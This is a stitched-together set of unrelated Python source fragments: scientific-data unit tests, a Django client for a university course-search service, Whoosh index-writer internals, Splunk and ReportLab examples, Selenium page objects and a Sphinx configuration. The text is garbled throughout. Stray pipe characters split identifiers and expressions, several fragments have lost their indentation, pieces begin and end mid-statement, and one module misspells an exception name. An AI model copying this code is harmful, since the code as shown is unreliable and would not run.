[1., -1., 0.],
[0., 0., 1.],
[0., 0., -1.]])
self.mesh_elements = np.array([[0, 1, 4],
[0, 1, 5],
[1, 2, 4],
[1, 2, 5],
[2, 3, 4],
[2, 3, 5],
[3, 0, 4],
[3, 0, 5]])
# Create 2 fields 'shape functions' for the 2 nodes at z=+/-1
self.mesh_shape_f1 = np.array([0., 0., 0., 0., 1., 0.])
self.mesh_shape_f2 = np.array([0., 0., 0., 0., 0., 1.])
# Create 2 element wise fields
self.mesh_el_Id = np.array([0., 1., 2., 3., 4., 5., 6., 7.])
self.mesh_alternated = np.array([1., 1., -1., -1., 1., 1., -1., -1.])
# Create a binary 3D Image
self.image = np.zeros((10, | 10, 10), dtype='int16')
self.image[:, :, :5] = 1
self.image_origin = np.array([-1., -1., -1.])
self.image_voxel_size = np.array([0.2, 0.2, 0.2])
# Create a data array
self.data_array = np.array([math.tan(x) for x in
np.linspace(-math.pi/4, math.pi/4, 51)])
# Create numpy dtype and structure array
# WARNING: Pytables transforms all strings into | bytes
# --> use only bytes in dtypes
self.dtype1 = np.dtype([('density', np.float32),
('melting_Pt', np.float32),
('Chemical_comp', 'S', 30)])
self.struct_array1 = np.array([(6.0, 1232, 'Cu2O'),
(5.85, 2608, 'ZrO2')],
dtype=self.dtype1)
# Test file pathes
self.filename = os.path.join(PYMICRO_EXAMPLES_DATA_DIR,
'test_sampledata')
self.derived_filename = self.filename+'_derived'
self.reference_file = os.path.join(PYMICRO_EXAMPLES_DATA_DIR,
'test_sampledata_ref')
    def test_create_sample(self):
        """Test creation of a SampleData instance/file and data storage.

        Exercises mesh/image/group/array writing, reload from file, and the
        autodelete behaviour.
        """
        sample = SampleData(filename=self.filename,
                            overwrite_hdf5=True, verbose=False,
                            sample_name=self.sample_name,
                            sample_description=self.sample_description)
        self.assertTrue(os.path.exists(self.filename + '.h5'))
        self.assertTrue(os.path.exists(self.filename + '.xdmf'))
        self.assertEqual(sample.get_sample_name(), self.sample_name)
        self.assertEqual(sample.get_description(), self.sample_description)
        # Add mesh data into SampleData dataset
        mesh = UMCT.CreateMeshOfTriangles(self.mesh_nodes, self.mesh_elements)
        # Add mesh node tags
        mesh.nodesTags.CreateTag('Z0_plane', False).SetIds([0, 1, 2, 3])
        mesh.nodesTags.CreateTag('out_of_plane', False).SetIds([4, 5])
        # Add element tags
        mesh.GetElementsOfType('tri3').GetTag('Top').SetIds([0, 2, 4, 6])
        mesh.GetElementsOfType('tri3').GetTag('Bottom').SetIds([1, 3, 5, 7])
        # Add mesh node fields
        mesh.nodeFields['Test_field1'] = self.mesh_shape_f1
        mesh.nodeFields['Test_field2'] = self.mesh_shape_f2
        # Add mesh element fields
        mesh.elemFields['Test_field3'] = self.mesh_el_Id
        mesh.elemFields['Test_field4'] = self.mesh_alternated
        sample.add_mesh(mesh, meshname='test_mesh', indexname='mesh',
                        location='/', bin_fields_from_sets=True)
        # Add image data into SampleData dataset
        image = ConstantRectilinearMesh(dim=len(self.image.shape))
        image.SetDimensions(self.image.shape)
        image.SetOrigin(self.image_origin)
        image.SetSpacing(self.image_voxel_size)
        image.elemFields['test_image_field'] = self.image
        sample.add_image(image, imagename='test_image', indexname='image',
                         location='/')
        # Add new group and array to SampleData dataset
        sample.add_group(groupname='test_group', location='/', indexname='group')
        sample.add_data_array(location='group', name='test_array',
                              array=self.data_array, indexname='array')
        # close sample data instance
        del sample
        # reopen sample data instance
        sample = SampleData(filename=self.filename)
        # test mesh geometry data recovery
        mesh_nodes = sample.get_mesh_nodes(meshname='mesh', as_numpy=True)
        self.assertTrue(np.all(mesh_nodes == self.mesh_nodes))
        mesh_elements = sample.get_mesh_xdmf_connectivity(meshname='mesh',
                                                          as_numpy=True)
        mesh_elements = mesh_elements.reshape(self.mesh_elements.shape)
        self.assertTrue(np.all(mesh_elements == self.mesh_elements))
        # test mesh field recovery
        shape_f1 = sample.get_field('Test_field1')
        self.assertTrue(np.all(shape_f1 == self.mesh_shape_f1))
        # test image field recovery and dictionary like access
        image_field = sample['test_image_field']
        self.assertTrue(np.all(image_field == self.image))
        # test data array recovery and attribute like access
        array = sample.test_array
        self.assertTrue(np.all(array == self.data_array))
        # test sampledata instance and file autodelete function
        sample.autodelete = True
        del sample
        self.assertTrue(not os.path.exists(self.filename+'.h5'))
        self.assertTrue(not os.path.exists(self.filename+'.xdmf'))
    def test_copy_and_compress(self):
        """ Copy the reference dataset and compress it """
        sample = SampleData.copy_sample(src_sample_file=self.reference_file,
                                        dst_sample_file=self.filename,
                                        overwrite=True, get_object=True,
                                        autodelete=True)
        # get filesizes
        original_filesize, _ = sample.get_file_disk_size(print_flag=False,
                                                         convert=False)
        original_size, _ = sample.get_node_disk_size('test_image_field',
                                                     print_flag=False,
                                                     convert=False)
        # Verify data content
        data_array = sample.get_node('test_array')
        self.assertTrue(np.all(self.data_array == data_array))
        # compress image data
        c_opt = {'complib': 'zlib', 'complevel': 1}
        sample.set_chunkshape_and_compression(nodename='test_image_field',
                                              compression_options=c_opt)
        # assert that node size is smaller after compression
        # NOTE(review): no assertion is actually made on new_size vs
        # original_size below -- consider self.assertLess(new_size,
        # original_size) if compression is guaranteed to shrink this node.
        new_size, _ = sample.get_node_disk_size('test_image_field',
                                                print_flag=False,
                                                convert=False)
        new_filesize, _ = sample.get_file_disk_size(print_flag=False,
                                                    convert=False)
        # repack file and assert file size is lower than original filesize
        sample.repack_h5file()
        new_filesize, _ = sample.get_file_disk_size(print_flag=False,
                                                    convert=False)
        self.assertGreater(original_filesize, new_filesize)
        # delete SampleData instance and assert files deletion
        del sample
        self.assertTrue(not os.path.exists(self.filename + '.h5'))
        self.assertTrue(not os.path.exists(self.filename + '.xdmf'))
def test_derived_class(self):
""" Test application specific data model specification through
derived classes.
Also test table functionalities.
"""
derived_sample = TestDerivedClass(filename=self.derived_filename,
|
import json
import logging
import httplib
import urllib2
from django.core.exceptions import ValidationError
from django.conf import settings
siaUrl=settings.SIA_URL
import re
import string
def sanitize_search_term(term):
    """Normalise *term* into a prefix-wildcard full-text search expression.

    Strips disallowed punctuation, keeps quoted phrases intact, joins bare
    words with '&', appends ':*' to each word, and doubles single quotes
    for safe embedding in SQL.
    """
    # Replace every punctuation character except &, |, " and ' with a space.
    allowed_punctuation = set(['&', '|', '"', "'"])
    stripped_chars = "".join(set(string.punctuation) - allowed_punctuation)
    term = re.sub(r"[{}]+".format(re.escape(stripped_chars)), " ", \
        term)
    # Collapse double quotes (and runs of quotes) down to one single quote.
    term = term.replace('"', "'")
    term = re.sub(r"[']+", "'", term)
    # Regexes used while processing the unquoted chunks.
    quoted_strings_re = re.compile(r"('[^']*')")
    space_between_words_re = re.compile(r'([^ &|])[ ]+([^ &|])')
    spaces_surrounding_letter_re = re.compile(r'[ ]+([^ &|])[ ]+')
    multiple_operator_re = re.compile(r"[ &]+(&|\|)[ &]+")
    processed_tokens = []
    for token in quoted_strings_re.split(term):
        token = token.strip()
        if token in ('', "'"):
            continue
        if not token.startswith("'"):
            # Surround single letters with &'s.
            token = spaces_surrounding_letter_re.sub(r' & \1 & ', token)
            # Default to '&' between words with no explicit operator.
            token = space_between_words_re.sub(r'\1 & \2', token)
            # Add a prefix wildcard to every search term.
            token = re.sub(r'([^ &|]+)', r'\1:*', token)
        processed_tokens.append(token)
    term = " & ".join(processed_tokens)
    # Collapse operator runs like " & & " down to a single operator.
    term = multiple_operator_re.sub(r" \1 ", term)
    # Escape single quotes for SQL embedding.
    return term.replace("'", "''")
class SIA:
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
cache = CacheManager(**parse_cache_config_options({
'cache.type': 'file',
'cache.data_dir': '/tmp/horariossiacache/data',
'cache.lock_dir': '/tmp/horariossiacache/lock',
'cache.regions': 'short_term, long_term',
'cache.short_term.type': 'memory',
'cache.short_term.expire': '3600',
'cache.long_term.type': 'file',
'cache.long_term.expire': '86400'
}))
    def existsSubject(this,name,level):
        """Return True when at least one subject matches *name* at *level*."""
        return this.queryNumSubjectsWithName(name,level)>0
def queryNumSubjectsWithName(this,name,level):
data = json.dumps({"method": "buscador.obtenerAsignaturas", "params": [name, level, "", level, "", "", 1, 1]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())["result"]["totalAsignaturas"]
f.close()
except urllib2.HTTPerror, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
return result
@cache.region('short_term')
def querySubjectsByName(this,name,level,maxRetrieve):
data = json.dumps({"method": "buscador.obtenerAsignaturas", "params": [name, level, "", level, "", "", 1, maxRetrieve]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())
f.close()
except urllib2.HTTPerror, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
return result["result"]["asignaturas"]["list"]
@cache.region('short_term')
def queryGroupsBySubjectCode(this,code):
data = json.dumps({"method": "buscador.obtenerGruposAsignaturas", "params": [code, "0"]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
result = None
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())
f.close()
except urllib2.HTTPError, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
if result:
return result["result"]["list"]
else:
return []
@staticmethod
@cache.region('short_term')
def queryGroupsProfessions(code,group):
import re
while True:
try:
f = urllib2.urlopen(siaUrl + "/service/groupInfo.pub?cod_asignatura=" + str(code) + "&grp=" + str(group))
html = f.read().decode("ISO-8859-1")
break
except urllib2.URLError, e:
if e.code == 403:
pass
else:
logging.warning(str(e))
break
except Exception, e:
logging.warning(str(e))
break
relevantSection = re.compile(r'Los planes de estudio para los cuales se ofrece esta asignatura son:</p><div><ul class="modulelist">(.*)</ul></div>').findall(html)
professions = []
if (len(relevantSection)>0):
professionsHtml = re.compile('<li><p>(.*?)</p></li>').findall(relevantSection[0])
for i in professionsHtml:
data = i.split("-")
professions.append((data[0].strip(),re.compile('<em>(.*)</em>').findall("".join(data[1:]))[0]))
return professions |
self.storage = ix.storage
self.indexname = ix.indexname
info = ix._read_toc()
self.generation = info.generation + 1
self.schema = info.schema
self.segments = info.segments
self.docnum = self.docbase = docbase
self._setup_doc_offsets()
# Internals
self.compound = compound
poolprefix = "whoosh_%s_" % self.indexname
self.pool = PostingPool(limitmb=limitmb, prefix=poolprefix)
newsegment = self.newsegment = codec.new_segment(self.storage,
self.indexname)
self.is_closed = False
self._added = False
# Set up writers
self.perdocwriter = codec.per_document_writer(self.storage, newsegment)
self.fieldwriter = codec.field_writer(self.storage, newsegment)
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.newsegment)
def _setup_doc_offsets(self):
self._doc_offsets = []
base = 0
for s in self.segments:
self._doc_offsets.append(base)
base += s.doc_count_all()
def _check_state(self):
if self.is_closed:
raise IndexingError("This writer is closed")
    def add_field(self, fieldname, fieldspec, **kwargs):
        """Add a field to the schema.

        The schema is frozen once documents have been added: raises if the
        writer is closed or data has already been written.
        """
        self._check_state()
        if self._added:
            raise Exception("Can't modify schema after adding data to writer")
        super(SegmentWriter, self).add_field(fieldname, fieldspec, **kwargs)
    def remove_field(self, fieldname):
        """Remove a field from the schema.

        The schema is frozen once documents have been added: raises if the
        writer is closed or data has already been written.
        """
        self._check_state()
        if self._added:
            raise Exception("Can't modify schema after adding data to writer")
        super(SegmentWriter, self).remove_field(fieldname)
    def _document_segment(self, docnum):
        """Return the index (into self.segments) of the segment containing
        the given overall document number.

        Note: despite the old comment, this returns a position, not a
        Segment object; _segment_and_docnum resolves the object.
        """
        offsets = self._doc_offsets
        # With a single segment the document can only live there.
        if len(offsets) == 1:
            return 0
        # Rightmost segment whose base offset is <= docnum.
        return bisect_right(offsets, docnum) - 1
    def _segment_and_docnum(self, docnum):
        """Return an (index.Segment, segment_docnum) pair for the segment
        containing the given overall document number."""
        segmentnum = self._document_segment(docnum)
        offset = self._doc_offsets[segmentnum]
        segment = self.segments[segmentnum]
        # The per-segment docnum is relative to the segment's base offset.
        return segment, docnum - offset
def has_deletions(self):
"""
Returns True if this index has documents that are marked deleted but
haven't been optimized out of the index yet.
"""
return any(s.has_deletions() for s in self.segments)
    def delete_document(self, docnum, delete=True):
        """Mark (or with delete=False, unmark) the given overall document
        number as deleted in whichever segment contains it.

        :raises IndexingError: if docnum is beyond the total document count.
        """
        self._check_state()
        # NOTE(review): this sums the segments' ``doccount`` attribute while
        # _setup_doc_offsets uses doc_count_all() — presumably deleted docs
        # are excluded here; confirm against the Segment API.
        if docnum >= sum(seg.doccount for seg in self.segments):
            raise IndexingError("No document ID %r in this index" % docnum)
        segment, segdocnum = self._segment_and_docnum(docnum)
        segment.delete_document(segdocnum, delete=delete)
def deleted_count(self):
"""
:returns: the total number of deleted documents in the index.
"""
return sum(s.deleted_count() for s in self.segments)
    def is_deleted(self, docnum):
        """Return True if the given overall document number is marked deleted."""
        segment, segdocnum = self._segment_and_docnum(docnum)
        return segment.is_deleted(segdocnum)
    def reader(self, reuse=None):
        """Return a reader over the index at this writer's generation.

        :param reuse: an existing reader whose resources may be recycled.
        """
        # Imported here to avoid a circular import with fileindex.
        from whoosh.filedb.fileindex import FileIndex
        self._check_state()
        return FileIndex._reader(self.storage, self.schema, self.segments,
                                 self.generation, reuse=reuse)
    def iter_postings(self):
        """Iterate the postings buffered in this writer's pool."""
        return self.pool.iter_postings()
def add_postings(self, lengths, items, startdoc, docmap):
# items = (fieldname, text, docnum, weight, valuestring) ...
schema = self.schema
# Make a generator to strip out deleted fields and renumber the docs
# before passing them down to the field writer
def gen():
for fieldname, text, docnum, weight, valuestring in items:
if fieldname not in schema:
continue
if docmap is not None:
newdoc = docmap[docnum]
else:
newdoc = startdoc + docnum
yield (fieldname, text, newdoc, weight, valuestring)
self.fieldwriter.add_postings(schema, lengths, gen())
def _make_docmap(self, reader, newdoc):
# If the reader has deletions, make a dictionary mapping the docnums
# of undeleted documents to new sequential docnums starting at newdoc
hasdel = reader.has_deletions()
if hasdel:
docmap = {}
for docnum in reader.all_doc_ids():
if reader.is_deleted(docnum):
continue
| docmap[docnum] = newdoc
newdoc += 1
else:
docmap = None
newdoc += reader.doc_count_all()
# Return the map and the new lowest unused document number
return docmap, newdoc
    def _merge_per_doc(self, reader, docmap):
        """Copy per-document data (stored fields, field lengths, vectors)
        from ``reader`` into this writer, renumbering via ``docmap`` when
        one was built by _make_docmap."""
        schema = self.schema
        newdoc = self.docnum
        perdocwriter = self.perdocwriter
        # Only fields present in both schemas can be carried over.
        sharedfields = set(schema.names()) & set(reader.schema.names())
        for docnum in reader.all_doc_ids():
            # Skip deleted documents
            if docmap and docnum not in docmap:
                continue
            # Renumber around deletions
            if docmap:
                newdoc = docmap[docnum]
            # Get the stored fields
            d = reader.stored_fields(docnum)
            # Start a new document in the writer
            perdocwriter.start_doc(newdoc)
            # For each field in the document, copy its stored value,
            # length, and vectors (if any) to the writer
            for fieldname in sharedfields:
                field = schema[fieldname]
                length = (reader.doc_field_length(docnum, fieldname, 0)
                          if field.scorable else 0)
                perdocwriter.add_field(fieldname, field, d.get(fieldname),
                                       length)
                if field.vector and reader.has_vector(docnum, fieldname):
                    v = reader.vector(docnum, fieldname)
                    perdocwriter.add_vector_matcher(fieldname, field, v)
            # Finish the new document
            perdocwriter.finish_doc()
            newdoc += 1
    def _merge_fields(self, reader, docmap):
        """Add ``reader``'s inverted-index postings to the pool, renumbering
        document number references as necessary via ``docmap``."""
        add_post = self.pool.add
        # Note: iter_postings() only yields postings for undeleted docs
        for p in renumber_postings(reader, self.docnum, docmap):
            add_post(p)
    def add_reader(self, reader):
        """Merge the full contents of an existing reader (e.g. another
        segment) into this writer, skipping and renumbering around any
        deleted documents."""
        self._check_state()
        # Make a docnum map to renumber around deleted documents
        docmap, newdoc = self._make_docmap(reader, self.docnum)
        # Add per-document values
        self._merge_per_doc(reader, docmap)
        # Add field postings
        self._merge_fields(reader, docmap)
        self.docnum = newdoc
        # Data has been written: the schema is frozen from here on.
        self._added = True
def _check_fields(self, schema, fieldnames):
# Check if the caller gave us a bogus field
for name in fieldnames:
if name not in schema:
raise UnknownFieldError("No field named %r in %s"
% (name, schema))
def add_document(self, **fields):
self._check_state()
perdocwriter = self.perdocwriter
schema = self.schema
docnum = self.docnum
add_post = self.pool.add
docboost = self._doc_boost(fields)
fieldnames = sorted([name for name in fields.keys()
if not name.startswith("_")])
self._check_fields(schema, fieldnames)
perdocwriter.start_doc(docnum)
# For each field...
for fieldname in fieldnames:
value = fields.get(fieldname)
if value is None:
continue
field = schema[fieldname]
length = 0
if field.indexed:
# |
import sublime
import unittest
import os
import sys
class TestImport(unittest.TestCase):
    """Smoke test: the bundled winpty binary module is importable inside
    Sublime Text and can spawn and terminate a console process."""
    # sys.path entry added in setUpClass, remembered so tearDownClass can undo it.
    mpath = None
    @classmethod
    def setUpClass(cls):
        basedir = os.path.dirname(__file__)
        # Platform/arch-specific folder holding the prebuilt binaries.
        mpath = os.path.normpath(os.path.join(
            basedir, "..", "st3_{}_{}".format(sublime.platform(), sublime.arch())))
        if mpath not in sys.path:
            cls.mpath = mpath
            sys.path.append(mpath)
    def test_import(self):
        """Import winpty and spawn a real console to prove the bindings work."""
        from winpty import PtyProcess
        self.assertTrue("winpty" in sys.modules)
        proc = PtyProcess.spawn('cmd.exe')
        self.assertTrue(proc.isalive())
        proc.terminate(True)
    @classmethod
    def tearDownClass(cls):
        # Undo the sys.path / sys.modules changes made above.
        if not cls.mpath:
            return
        mpath = cls.mpath
        if mpath in sys.path:
            sys.path.remove(mpath)
        if "winpty" in sys.modules:
            del sys.modules["winpty"]
|
#!/usr/bin/env python
#
# Copyright 2011 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the speci | fic language governing permissions and limitations
# under the License.
"""Example of a ur | llib2 based HTTP request handler."""
from pprint import pprint
from StringIO import StringIO
import sys
import urllib2
import splunk.client as client
import utils
def request(url, message, **kwargs):
    """urllib2-based HTTP handler for splunklib's ``client.connect``.

    ``message`` is a dict with a 'method' plus optional 'body' and
    'headers'.  Returns the response as a dict of status / reason /
    headers / body, where body is a file-like StringIO.
    """
    method = message['method'].lower()
    # Only POSTs carry a body; GET/DELETE pass data=None.
    data = message.get('body', "") if method == 'post' else None
    headers = dict(message.get('headers', []))
    context = urllib2.Request(url, data, headers)
    try:
        response = urllib2.urlopen(context)
    except urllib2.HTTPError, response:
        pass # Propagate HTTP errors via the returned response message
    return {
        'status': response.code,
        'reason': response.msg,
        'headers': response.info().dict,
        'body': StringIO(response.read())
    }
# Parse .splunkrc/CLI options, connect through the custom handler above,
# and list the installed apps as a smoke test.
opts = utils.parse(sys.argv[1:], {}, ".splunkrc")
service = client.connect(handler=request, **opts.kwargs)
pprint(service.apps.list())
|
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
"""Tests for reportlab.lib.utils
"""
__version__=''' $Id$ '''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation
setOutDir(__name__)
import os, time, sys
import reportlab
import unittest
from reportlab.lib import colors
from reportlab.lib.utils import recursiveImport, recursiveGetAttr, recursiveSetAttr, rl_isfile, \
isCompactDistro, isPy3
def _rel_open_and_read(fn):
    """Read ``fn`` relative to the tests folder via open_and_read,
    restoring the current working directory afterwards."""
    from reportlab.lib.utils import open_and_read
    from reportlab.lib.testutils import testsFolder
    prev_dir = os.getcwd()
    os.chdir(testsFolder)
    try:
        return open_and_read(fn)
    finally:
        # Always restore the caller's working directory.
        os.chdir(prev_dir)
class ImporterTestCase(unittest.TestCase):
    "Test import utilities"
    # Class-level counter so each test run gets a unique temp module name.
    count = 0
    def setUp(self):
        from reportlab.lib.utils import get_rl_tempdir
        s = repr(int(time.time())) + repr(self.count)
        self.__class__.count += 1
        self._tempdir = get_rl_tempdir('reportlab_test','tmp_%s' % s)
        if not os.path.isdir(self._tempdir):
            os.makedirs(self._tempdir,0o700)
        _testmodulename = os.path.join(self._tempdir,'test_module_%s.py' % s)
        f = open(_testmodulename,'w')
        f.write('__all__=[]\n')
        f.close()
        if sys.platform=='darwin' and isPy3:
            # Let coarse-grained filesystem timestamps advance before import.
            time.sleep(0.3)
        self._testmodulename = os.path.splitext(os.path.basename(_testmodulename))[0]
    def tearDown(self):
        from shutil import rmtree
        rmtree(self._tempdir,1)
    def test1(self):
        "try stuff known to be in the path"
        m1 = recursiveImport('reportlab.pdfgen.canvas')
        import reportlab.pdfgen.canvas
        assert m1 == reportlab.pdfgen.canvas
    def test2(self):
        "try under a well known directory NOT on the path"
        from reportlab.lib.testutils import testsFolder
        D = os.path.join(testsFolder,'..','tools','pythonpoint')
        fn = os.path.join(D,'stdparser.py')
        if rl_isfile(fn) or rl_isfile(fn+'c') or rl_isfile(fn+'o'):
            m1 = recursiveImport('stdparser', baseDir=D)
    def test3(self):
        "ensure CWD is on the path"
        try:
            cwd = os.getcwd()
            os.chdir(self._tempdir)
            m1 = recursiveImport(self._testmodulename)
        finally:
            os.chdir(cwd)
    def test4(self):
        "ensure noCWD removes current dir from path"
        try:
            cwd = os.getcwd()
            os.chdir(self._tempdir)
            import sys
            try:
                del sys.modules[self._testmodulename]
            except KeyError:
                pass
            self.assertRaises(ImportError,
                              recursiveImport,
                              self._testmodulename,
                              noCWD=1)
        finally:
            os.chdir(cwd)
    def test5(self):
        "recursive attribute setting/getting on modules"
        import reportlab.lib.units
        inch = recursiveGetAttr(reportlab, 'lib.units.inch')
        assert inch == 72
        recursiveSetAttr(reportlab, 'lib.units.cubit', 18*inch)
        cubit = recursiveGetAttr(reportlab, 'lib.units.cubit')
        assert cubit == 18*inch
    def test6(self):
        "recursive attribute setting/getting on drawings"
        from reportlab.graphics.charts.barcharts import sampleH1
        drawing = sampleH1()
        recursiveSetAttr(drawing, 'barchart.valueAxis.valueMax', 72)
        theMax = recursiveGetAttr(drawing, 'barchart.valueAxis.valueMax')
        assert theMax == 72
    def test7(self):
        "test open and read of a simple relative file"
        b = _rel_open_and_read('../docs/images/Edit_Prefs.gif')
    def test8(self):
        "test open and read of a relative file: URL"
        b = _rel_open_and_read('file:../docs/images/Edit_Prefs.gif')
    def test9(self):
        "test open and read of an http: URL"
        from reportlab.lib.utils import open_and_read
        b = open_and_read('http://www.reportlab.com/rsrc/encryption.gif')
    def test10(self):
        "test open and read of a simple relative file"
        from reportlab.lib.utils import open_and_read, getBytesIO
        b = getBytesIO(_rel_open_and_read('../docs/images/Edit_Prefs.gif'))
        b = open_and_read(b)
    def test11(self):
        "test open and read of an RFC 2397 data URI with base64 encoding"
        result = _rel_open_and_read('data:image/gif;base64,R0lGODdhAQABAIAAAP///////ywAAAAAAQABAAACAkQBADs=')
        # FIX: assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(result,b'GIF87a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;')
    def test12(self):
        "test open and read of an RFC 2397 data URI without an encoding"
        result = _rel_open_and_read('data:text/plain;,Hello%20World')
        self.assertEqual(result,b'Hello World')
    def testRecursiveImportErrors(self):
        "check we get useful error messages"
        try:
            m1 = recursiveImport('reportlab.pdfgen.brush')
            self.fail("Imported a nonexistent module")
        except ImportError as e:
            self.assertIn('reportlab.pdfgen.brush',str(e))
        try:
            m1 = recursiveImport('totally.non.existent')
            self.fail("Imported a nonexistent module")
        except ImportError as e:
            self.assertIn('totally',str(e))
        try:
            #import a module in the 'tests' directory with a bug
            m1 = recursiveImport('unimportable')
            self.fail("Imported a buggy module")
        except Exception as e:
            self.assertIn(reportlab.isPy3 and 'division by zero' or 'integer division or modulo by zero',str(e))
def makeSuite():
    """Return the unittest suite containing this module's test case."""
    return makeSuiteForClasses(ImporterTestCase)
if __name__ == "__main__": #noruntests
unittest.TextTestRunner().run(makeSuite())
printLocation()
|
# ############################################################################
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
# ############################################################################
import pypom
from selenium.common.exceptions import NoSuchElementExcepti | on
from selenium.webdriver.common.by import By
from features.pages.common import CommonPageMixin
from features.fields.fields import InputField, SelectField, ButtonField
class SearchEntityPage(CommonPageMixin, pypom.Page):
    """Page object for the entity search screen."""
    URL_TEMPLATE = '/entities/'
    # Search-form fields and submit button, located by their DOM ids.
    acronym = InputField(By.ID, 'id_acronym')
    title = InputField(By.ID, 'id_title')
    entity_type = SelectField(By.ID, "id_entity_type")
    search = ButtonField(By.ID, "bt_submit_entity_search")
    def find_acronym_in_table(self, row: int = 1):
        """Return the acronym text shown in result row ``row`` (1-based)."""
        return self.find_element(By.ID, 'td_entity_%d' % row).text
class SearchOrganizationPage(CommonPageMixin, pypom.Page):
    """Page object for the organization search screen."""
    URL_TEMPLATE = '/organizations/'
    # Search-form fields and submit button, located by their DOM ids.
    acronym = InputField(By.ID, 'id_acronym')
    name = InputField(By.ID, 'id_name')
    type = SelectField(By.ID, "id_type")
    search = ButtonField(By.ID, "bt_submit_organization_search")
    def find_acronym_in_table(self, row: int = 1):
        """Return the acronym text shown in result row ``row`` (1-based)."""
        return self.find_element(By.ID, 'td_organization_%d' % row).text
class SearchStudentPage(CommonPageMixin, pypom.Page):
    """Page object for the student search screen."""
    URL_TEMPLATE = '/students/'
    # Search-form fields and submit button, located by their DOM ids.
    registration_id = InputField(By.ID, 'id_registration_id')
    name = InputField(By.ID, 'id_name')
    search = ButtonField(By.ID, "bt_submit_student_search")
    def find_registration_id_in_table(self, row: int = 1):
        """Return the registration id text shown in result row ``row`` (1-based)."""
        return self.find_element(By.ID, 'td_student_%d' % row).text
    def find_name_in_table(self):
        """Collect student names from successive result rows, in display
        order, stopping at the first missing row.

        Cleanup of the original: the ``last`` flag was never set, the final
        ``return`` was unreachable, and the caught exception was unused.
        """
        names = []
        row = 1
        while True:
            try:
                elt = self.find_element(By.ID, 'spn_student_name_%d' % row)
            except NoSuchElementException:
                # No more rows: we've read every result.
                return names
            names.append(elt.text)
            row += 1
|
# -*- coding: utf-8 -*-
#
# tm1640-rpi documentation build configuration file, created by
# sphinx-quickstart on Fri Apr 12 19:52:17 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../src/python/'))
# Hack for readthedocs: run doxygen first so breathe has XML to consume.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
    from subprocess import call
    call('doxygen')  # writes doxygen-xml/, referenced by breathe_projects below
    del call  # keep the conf namespace clean for Sphinx
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'breathe']
breathe_projects = {'tm1640-rpi': 'doxygen-xml/'}
breathe_default_project = 'tm1640-rpi'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tm1640-rpi'
copyright = u'2013, Michael Farrell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
